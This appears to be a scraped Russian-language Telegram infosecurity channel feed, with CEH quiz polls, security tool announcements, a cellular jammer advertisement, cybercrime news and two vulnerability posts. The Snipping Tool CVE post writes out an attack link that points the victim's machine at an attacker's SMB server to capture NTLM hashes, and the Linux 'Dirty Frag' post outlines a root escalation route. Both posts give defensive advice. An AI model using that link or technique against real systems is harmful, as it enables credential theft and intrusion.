Рубрика: "ИБ на A,B,C,D" №29 #CEH
Алекс проводит сканирование сервера. Для этого он использует метод, при котором заголовок TCP разбивается на множество пакетов, чтобы затруднить определение назначения этих пакетов. Какой метод использует Алекс?
Алекс проводит сканирование сервера. Для этого он использует метод, при котором заголовок TCP разбивается на множество пакетов, чтобы затруднить определение назначения этих пакетов. Какой метод использует Алекс?
Anonymous Quiz
12%
Inverse TCP flag scanning
71%
IP Fragmentation Scan
5%
TCP Scanning
12%
ACK flag scanning
🆒3❤🔥2❤1
#tools
Cybersecurity AI (CAI)🖥
Cybersecurity AI (CAI) — это легковесная платформа с открытым исходным кодом, которая позволяет специалистам по безопасности создавать и внедрять автоматизированные решения для наступательных и оборонительных действий в ИБ на основе искусственного интеллекта.
Для тех, кто собирается тестировать данное решение, прикладываем статью, в которой автор опробовал инструмент на популярных тренировочных ресурсах и показал результаты работы.
Cybersecurity AI (CAI)
Cybersecurity AI (CAI) — это легковесная платформа с открытым исходным кодом, которая позволяет специалистам по безопасности создавать и внедрять автоматизированные решения для наступательных и оборонительных действий в ИБ на основе искусственного интеллекта.
Для тех, кто собирается тестировать данное решение, прикладываем статью, в которой автор опробовал инструмент на популярных тренировочных ресурсах и показал результаты работы.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security
Cybersecurity AI (CAI), the framework for AI Security - aliasrobotics/cai
👌3🆒2❤1❤🔥1🤨1
#byapsecurity
Подавитель сотовой связи БЛ 2020🛡
Блокиратор сотовой связи и беспроводного доступа «БЛ-2020», предназначен для предотвращения несанкционированной передачи информации по каналам сотовой связи и сетям беспроводного доступа, а также исключения возможности дистанционного управления различного рода устройствами.
Отличительные особенности:
✔️ изделие имеет модульную конструкцию, которая позволяет «собирать» блокиратор, исходя из конкретных требований заказчика. Базовая поставка может включать один или два модуля изделия;
✔️ изделие обеспечивает блокирование самых распространенных на сегодняшний день стандартов сотовой связи 2G,3G,4G и сетей беспроводного доступа Bluetooth, Wi-Fi, в том числе в диапазоне 5850-5950МГц;
✔️ выходная мощность на антенном выходе на нагрузке 50 Ом устанавливается в диапазоне 0,5- 2,0 Вт;
✔️ внешние штыревые антенны позволяют создавать круговую зону блокирования, а применение направленных антенн обеспечивают локальную зону блокирования;
✔️ блокирование осуществляется постоянно в режиме «заградительная помеха». Зона блокирования в этом случае регулируется только мощностью блокирующего сигнала и применением определенных антенн.
Подробнее ✍️: https://apsecurity.ru/products/cellular-communication-blocker/bl2020
Подавитель сотовой связи БЛ 2020
Блокиратор сотовой связи и беспроводного доступа «БЛ-2020», предназначен для предотвращения несанкционированной передачи информации по каналам сотовой связи и сетям беспроводного доступа, а также исключения возможности дистанционного управления различного рода устройствами.
Отличительные особенности:
Подробнее ✍️: https://apsecurity.ru/products/cellular-communication-blocker/bl2020
Please open Telegram to view this post
VIEW IN TELEGRAM
👌3🆒3👎1🤔1
#soc #tools
OSS2Falco🖥
Falco — это популярный инструмент с открытым исходным кодом для обеспечения безопасности облачных сред и контейнеров, который оповещает о подозрительной активности.
OSS2Falco — это набор правил Falco, преобразованных из популярных инструментов и наборов правил с открытым исходным кодом.
OSS2Falco
Falco — это популярный инструмент с открытым исходным кодом для обеспечения безопасности облачных сред и контейнеров, который оповещает о подозрительной активности.
OSS2Falco — это набор правил Falco, преобразованных из популярных инструментов и наборов правил с открытым исходным кодом.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - sammonsempes/OSS2Falco: OSS2Falco: Falco rules converted from popular open-source security ruleset/tools (LinPEAS, Sigma…
OSS2Falco: Falco rules converted from popular open-source security ruleset/tools (LinPEAS, Sigma, Splunk) - sammonsempes/OSS2Falco
🤝4🆒2🤣1
Рубрика: "ИБ на A,B,C,D" №30 #CEH
Как называется набор расширения DNS, предоставляющий аутентификацию владельца домена, подтверждённое отсутствие записи и целостность возвращаемых данных, но не обеспечивает доступность сервера или конфиденциальность?
Как называется набор расширения DNS, предоставляющий аутентификацию владельца домена, подтверждённое отсутствие записи и целостность возвращаемых данных, но не обеспечивает доступность сервера или конфиденциальность?
Anonymous Quiz
17%
Resource records
66%
DNSSEC
6%
Resource transfer
10%
Zone transfer
❤🔥4🆒2
#cve
CVE-2026-33829📱
CVE-2026-33829 — это уязвимость в стандартном приложении Windows «Ножницы» (Snipping Tool), раскрывающая хеши Net-NTLMv2 пользователя. Злоумышленнику достаточно заставить жертву перейти по специально созданной ссылке, чтобы перехватить данные для авторизации.
Сам же PoC демонстрирует атаку в локальной сети.
➡️ Проблема кроется в некорректной обработке URI-схемы ms-screensketch. При попытке открыть ссылку вида ms-screensketch:edit?filePath=\\server_злоумышленника\file.png происходит попытка подключения к SMB-серверу, автоматически отправляя хеш пароля.
В случае отсутствия возможности обновления системы до последней версии, наблюдайте за активностью порта 445 (если он не заблокирован на границе сети), а также проинформируйте сотрудников, что стандартные приложения вроде «Ножниц» не должны открываться по запросу из браузера или почты.
CVE-2026-33829
CVE-2026-33829 — это уязвимость в стандартном приложении Windows «Ножницы» (Snipping Tool), раскрывающая хеши Net-NTLMv2 пользователя. Злоумышленнику достаточно заставить жертву перейти по специально созданной ссылке, чтобы перехватить данные для авторизации.
Сам же PoC демонстрирует атаку в локальной сети.
В случае отсутствия возможности обновления системы до последней версии, наблюдайте за активностью порта 445 (если он не заблокирован на границе сети), а также проинформируйте сотрудников, что стандартные приложения вроде «Ножниц» не должны открываться по запросу из браузера или почты.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
redteam-research/CVE-2026-33829 at master · blackarrowsec/redteam-research
Collection of PoC and offensive techniques used by the BlackArrow Red Team - blackarrowsec/redteam-research
✍4🆒2
#news
Контртерроризм по-новому: США вписали наступательные хакерские атаки в национальную стратегию📶
Администрация США включила наступательные кибероперации в новую контртеррористическую стратегию. Документ предусматривает применение цифровых операций против структур и лиц, считающихся Вашингтоном угрозой американским интересам, а также против пособников подготовки атак на американцев.
Сам формат подобных операций в стратегии не раскрывается, но прямое упоминание кибератак показывает превращение цифровых инструментов в часть государственной силовой политики.
Для союзников США новая стратегия тоже будет иметь значение. При расширении применения наступательных операций в контртеррористической политике другие страны могут копировать модель или ссылаться на неё для обоснования собственных действий.
Источник: https://cisoclub.ru/kontrterrorizm-po-novomu-ssha-vpisali-nastupatelnye-hakerskie-ataki-v-nacionalnuju-strategiju/
Контртерроризм по-новому: США вписали наступательные хакерские атаки в национальную стратегию
Администрация США включила наступательные кибероперации в новую контртеррористическую стратегию. Документ предусматривает применение цифровых операций против структур и лиц, считающихся Вашингтоном угрозой американским интересам, а также против пособников подготовки атак на американцев.
Сам формат подобных операций в стратегии не раскрывается, но прямое упоминание кибератак показывает превращение цифровых инструментов в часть государственной силовой политики.
Для союзников США новая стратегия тоже будет иметь значение. При расширении применения наступательных операций в контртеррористической политике другие страны могут копировать модель или ссылаться на неё для обоснования собственных действий.
Источник: https://cisoclub.ru/kontrterrorizm-po-novomu-ssha-vpisali-nastupatelnye-hakerskie-ataki-v-nacionalnuju-strategiju/
Please open Telegram to view this post
VIEW IN TELEGRAM
👀4⚡2❤1
Рубрика: "ИБ на A,B,C,D" №31 #CEH
Какой из перечисленных ниже методов позволяет определить путь прохождения пакета данных от недоверенного внешнего хоста к защищенному внутреннему, находящемуся за брандмауэром?
Какой из перечисленных ниже методов позволяет определить путь прохождения пакета данных от недоверенного внешнего хоста к защищенному внутреннему, находящемуся за брандмауэром?
Anonymous Quiz
5%
Session hijacking
41%
Network sniffing
38%
Firewalking
16%
MITM
❤4
#pentest #cve
Dirty Frag: Universal Linux LPE🖥
Два бага в ядре Linux (CVE-2026-43284 и CVE-2026-43500), позволяющие локальному пользователю без прав получить root через запись шеллкода в кэш страниц системных бинарных файлов (например, /usr/bin/su или /usr/bin/sudo).
Условия эксплуатации:
◽️ нужен локальный shell (физический доступ или взломанный пользователь)
◽️ любое ядро Linux с 2017 года по апрель 2026 года (до выхода патча)
◽️ достаточно любого непривилегированного пользователя
Меры защиты:
📌 Срочно обновить ядро до версии с патчем (патч уже выпущен дистрибутивами)
📌 При отсутствии возможности обновиться необходимо заблокировать три модуля ядра - esp4,esp6,rxrpc. Важно: пострадает IPsec ( использует модули esp4, esp6) - блокировка нарушит работу VPN-серверов. Блокировка нарушит работу клиентов файловой системы AFS (Andrew File System) ( модуль rxrpc ).
📌 Ограничить локальный доступ к системе — чем меньше непривилегированных пользователей, тем лучше.
Dirty Frag: Universal Linux LPE
Два бага в ядре Linux (CVE-2026-43284 и CVE-2026-43500), позволяющие локальному пользователю без прав получить root через запись шеллкода в кэш страниц системных бинарных файлов (например, /usr/bin/su или /usr/bin/sudo).
Условия эксплуатации:
Меры защиты:
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - V4bel/dirtyfrag
Contribute to V4bel/dirtyfrag development by creating an account on GitHub.
🆒3✍1
#news
Япония готовится к отражению кибератак со стороны ИИ типа Mythos🔩
Власти Японии обнаружили пробелы в законодательстве, которые препятствуют оперативной работе по отражению и ликвидации последствий возможных кибератак со стороны модели искусственного интеллекта (ИИ) типа Mythos. Министр связи Есимаса Хаяси заявил, что противодействие сложным атакам является «неотложным вопросом», пишет издание The Asahi Shimbun.
Правящая Либерально-демократическая партия призвала правительственные учреждения создать более прочные защитные структуры. Усилия по созданию таких систем в настоящее время предпринимаются быстрыми темпами. 20 апреля состоялось экстренное партийное совещание с приглашением представителей разработчика ИИ Anthropic. Как сообщается, компания выразила готовность помочь Японии в решении проблем.
Источник: https://www.kommersant.ru/doc/8624552
Япония готовится к отражению кибератак со стороны ИИ типа Mythos
Власти Японии обнаружили пробелы в законодательстве, которые препятствуют оперативной работе по отражению и ликвидации последствий возможных кибератак со стороны модели искусственного интеллекта (ИИ) типа Mythos. Министр связи Есимаса Хаяси заявил, что противодействие сложным атакам является «неотложным вопросом», пишет издание The Asahi Shimbun.
Правящая Либерально-демократическая партия призвала правительственные учреждения создать более прочные защитные структуры. Усилия по созданию таких систем в настоящее время предпринимаются быстрыми темпами. 20 апреля состоялось экстренное партийное совещание с приглашением представителей разработчика ИИ Anthropic. Как сообщается, компания выразила готовность помочь Японии в решении проблем.
Источник: https://www.kommersant.ru/doc/8624552
Please open Telegram to view this post
VIEW IN TELEGRAM
👌2✍1
#pentest #tools
Pentest Copilot⚙️
Браузерный ИИ-ассистент для специалистов по безопасности, который автоматизирует и облегчает решение задач при тестировании на проникновение.
Pentest Copilot
Браузерный ИИ-ассистент для специалистов по безопасности, который автоматизирует и облегчает решение задач при тестировании на проникновение.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - bugbasesecurity/pentest-copilot: Pentest Copilot is an AI-powered browser based ethical hacking assistant tool designed…
Pentest Copilot is an AI-powered browser based ethical hacking assistant tool designed to streamline pentesting workflows. - bugbasesecurity/pentest-copilot
🤝4✍1
#news
Задержан серийный взломщик аккаунтов пользователей маркетплейсов 🔎
Сотрудники отдела по борьбе с противоправным использованием информационно-телекоммуникационных технологий УМВД России по Пензенской области выявили и задержали подозреваемого во взломе учётных записей пользователей маркетплейсов. По версии следствия, он оформлял от их имени покупки дорогостоящих товаров в рассрочку.
Дело было возбуждено после трёх обращений жителей Пензенской области о несанкционированных списаниях с их платёжных карт крупных сумм. Ущерб по этим эпизодам составил 150 тыс. рублей.
От имени владельцев таких аккаунтов он приобретал дорогостоящие товары в рассрочку, а затем перепродавал их. После достижения лимитов на рассрочку злоумышленник, по версии следствия, продавал и сами учётные записи. Кроме того, как выяснилось, фигурант активно регистрировал подставные аккаунты в различных мессенджерах и также торговал ими.
Как сообщили в УМВД по Пензенской области, фигуранту также предъявлены дополнительные обвинения по ч. 2 статьи 272 УК РФ (неправомерный доступ к компьютерной информации) и статье 274.4 УК РФ (организация деятельности по передаче абонентских номеров с нарушением законодательства РФ). Ему избрана мера пресечения в виде заключения под стражу.
Источник: https://www.anti-malware.ru/news/2026-05-22-121598/50137
Задержан серийный взломщик аккаунтов пользователей маркетплейсов 🔎
Сотрудники отдела по борьбе с противоправным использованием информационно-телекоммуникационных технологий УМВД России по Пензенской области выявили и задержали подозреваемого во взломе учётных записей пользователей маркетплейсов. По версии следствия, он оформлял от их имени покупки дорогостоящих товаров в рассрочку.
Дело было возбуждено после трёх обращений жителей Пензенской области о несанкционированных списаниях с их платёжных карт крупных сумм. Ущерб по этим эпизодам составил 150 тыс. рублей.
От имени владельцев таких аккаунтов он приобретал дорогостоящие товары в рассрочку, а затем перепродавал их. После достижения лимитов на рассрочку злоумышленник, по версии следствия, продавал и сами учётные записи. Кроме того, как выяснилось, фигурант активно регистрировал подставные аккаунты в различных мессенджерах и также торговал ими.
Как сообщили в УМВД по Пензенской области, фигуранту также предъявлены дополнительные обвинения по ч. 2 статьи 272 УК РФ (неправомерный доступ к компьютерной информации) и статье 274.4 УК РФ (организация деятельности по передаче абонентских номеров с нарушением законодательства РФ). Ему избрана мера пресечения в виде заключения под стражу.
Источник: https://www.anti-malware.ru/news/2026-05-22-121598/50137
❤3🆒1
#tools
DontFeedTheAI📌
Тема утечки данных в посторонние сервисы, связанные с LLM, становится наиболее актуальной на сегодняшний день.
Представленное решение позволяет в некоторой степени обеспечить с помощью базовых принципов обработку запросов к внешнему ресурсу, запоминая подмену и возвращая ответ пользователю в изначальном виде.
DontFeedTheAI
Тема утечки данных в посторонние сервисы, связанные с LLM, становится наиболее актуальной на сегодняшний день.
Представленное решение позволяет в некоторой степени обеспечить с помощью базовых принципов обработку запросов к внешнему ресурсу, запоминая подмену и возвращая ответ пользователю в изначальном виде.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - zeroc00I/DontFeedTheAI: Transparent anonymization proxy for AI-assisted pentesting. Strips IPs, credentials, hostnames…
Transparent anonymization proxy for AI-assisted pentesting. Strips IPs, credentials, hostnames and PII before they reach any LLM (Claude, OpenAI, OpenRouter). Local Ollama + regex detection. Per-en...
👌2🆒1
#news
Бесплатный VPN оказался банковским трояном: МВД предупредило о новой схеме ✍️
МВД предупредило о новом бесплатном VPN, который на деле оказался совсем не сервисом для приватного доступа в интернет, а банковским трояном с неприятным бонусом в виде загрузчика вредоносных модулей. Схема классическая: пользователь ищет VPN, ставит приложение из стороннего источника, а дальше вместо свободы в Сети получает на устройство зловред.
Пользователям советуют устанавливать приложения только из официальных магазинов, хотя и это, как уточняют в ведомстве, не даёт стопроцентной гарантии безопасности.
История не новая, но всё ещё рабочая: слово «бесплатно» отлично продаёт даже откровенно подозрительный APK. Поэтому правило простое: если VPN найден не в официальном магазине, просит странные разрешения и выглядит как подарок судьбы — скорее всего, подарок там не вам, а мошенникам.
Источник: https://www.anti-malware.ru/news/2026-05-26-111332/50162
Бесплатный VPN оказался банковским трояном: МВД предупредило о новой схеме ✍️
МВД предупредило о новом бесплатном VPN, который на деле оказался совсем не сервисом для приватного доступа в интернет, а банковским трояном с неприятным бонусом в виде загрузчика вредоносных модулей. Схема классическая: пользователь ищет VPN, ставит приложение из стороннего источника, а дальше вместо свободы в Сети получает на устройство зловред.
Пользователям советуют устанавливать приложения только из официальных магазинов, хотя и это, как уточняют в ведомстве, не даёт стопроцентной гарантии безопасности.
История не новая, но всё ещё рабочая: слово «бесплатно» отлично продаёт даже откровенно подозрительный APK. Поэтому правило простое: если VPN найден не в официальном магазине, просит странные разрешения и выглядит как подарок судьбы — скорее всего, подарок там не вам, а мошенникам.
Источник: https://www.anti-malware.ru/news/2026-05-26-111332/50162
⚡1🤣1